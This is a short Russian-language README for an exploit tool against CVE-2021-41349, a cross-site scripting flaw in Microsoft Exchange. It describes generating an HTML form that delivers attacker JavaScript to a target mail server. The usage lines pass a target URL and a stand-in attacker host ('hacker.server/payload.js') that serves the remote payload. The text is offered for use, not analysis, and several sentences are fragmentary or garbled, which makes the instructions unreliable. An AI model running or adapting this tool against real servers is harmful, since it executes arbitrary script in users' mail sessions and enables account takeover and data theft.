
Эксплойт-инструмент для CVE-2021-41349, который генерирует HTML-форму для доставки XSS-пейлоадов на серверы Microsoft Exchange, позволяя выполнять произвольный JavaScript.
Эксплуатация: CVE-2021-41349
Этот инструмент эксплуатации создает форму для отправки XSS-пейлоада на целевой сервер Exchange.
Вам необходимо создать js-файл, содержащий то, что вы хотите выполнить.
js-пейлоад и загрузите его куда-нибудь.CVE-2021-41349.py следующим образом.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
или:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html-файл на сервер.